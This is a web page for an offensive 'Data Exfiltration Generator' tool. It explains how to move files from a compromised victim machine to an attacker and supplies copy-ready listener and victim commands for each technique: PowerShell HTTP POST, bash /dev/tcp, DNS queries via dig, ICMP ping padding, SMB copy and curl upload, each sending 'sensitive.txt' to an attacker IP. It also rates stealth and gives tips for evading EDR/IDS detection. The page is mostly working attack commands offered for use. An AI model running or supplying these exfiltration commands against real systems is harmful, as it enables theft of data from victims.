Interactive Tool

Data Exfiltration Generator

Configure your listener details below to generate ready-to-use exfiltration commands. Filter by OS and protocol to find the best technique for your scenario.

OpSec Warning

DNS and ICMP tunneling are extremely noisy and easily detected by modern EDR/IDS solutions. Prefer encrypted channels (HTTPS) or legitimate cloud services where possible.

🎓 How to use this tool

Data exfiltration is the process of moving data from a compromised machine (the victim) to your machine (the attacker).

  1. Configure your IP: Enter your attacker IP address (LHOST) below. This is where the data will be sent.
  2. Set up a Listener: Before running any command on the victim, you must start a "listener" on your machine to receive the data. Look for the 1. ATTACKER LISTENER box in each card.
  3. Run the Payload: Copy the command from the 2. VICTIM COMMAND box and run it on the target machine.

⚙️ Configuration

PowerShell Invoke-WebRequest

LOW STEALTHHTTP

Standard HTTP POST exfiltration. Fast but logs to PowerShell history and easily flagged.

💡 Tip: Run the listener command on your attacker machine first. The file content will be saved to data.txt.
1. Attacker Listener (Run this first)
nc -lvnp 8000 > data.txt
2. Victim Command (Run on target)
$data = Get-Content ".\sensitive.txt" -Raw
Invoke-WebRequest -Uri "http://10.10.14.5:8000/exfil" -Method POST -Body $data

Bash TCP Redirect

MEDIUM STEALTHTCP

Native Bash feature. Very fast, creates a direct socket connection.

💡 Tip: This uses the built-in /dev/tcp device file in Linux. No special tools needed on the victim.
1. Attacker Listener (Run this first)
nc -lvnp 8000 > data.txt
2. Victim Command (Run on target)
cat sensitive.txt > /dev/tcp/10.10.14.5/8000

Manual DNS Exfiltration

HIGH STEALTHDNS

Encodes file line-by-line into DNS queries. Bypasses most firewalls but very slow and noisy in logs.

💡 Tip: You will see the file content (hex encoded) in your DNS logs. You need to reassemble it later.
1. Attacker Listener (Run this first)
tcpdump -i eth0 udp port 53
2. Victim Command (Run on target)
# Linux/Bash
for line in $(cat sensitive.txt | xxd -p); do dig $line.exfil.10.10.14.5; done

ICMP Ping Exfiltration

MEDIUM STEALTHICMP

Hides data inside ICMP echo request payloads.

💡 Tip: Data is hidden in the padding of the ping packet. Use Wireshark or tcpdump to capture it.
1. Attacker Listener (Run this first)
tcpdump -i eth0 icmp
2. Victim Command (Run on target)
cat sensitive.txt | xxd -p -c 16 | while read line; do ping -c 1 -p $line 10.10.14.5; done

SMB Copy

LOW STEALTHSMB

Simple copy to a share. Requires outbound SMB (445) allowed.

💡 Tip: This creates a fake shared folder on your attacker machine. The victim copies the file to it.
1. Attacker Listener (Run this first)
impacket-smbserver share . -smb2support
2. Victim Command (Run on target)
copy "sensitive.txt" \\10.10.14.5\share\

Curl Upload

MEDIUM STEALTHHTTP

Standard file upload using curl.

💡 Tip: Standard HTTP upload. Requires a web server on your end that accepts file uploads (e.g., a simple PHP script).
1. Attacker Listener (Run this first)
python3 -m http.server 8000 (for download) / Custom PHP script for upload
2. Victim Command (Run on target)
curl -F "file=@sensitive.txt" http://10.10.14.5:8000/upload.php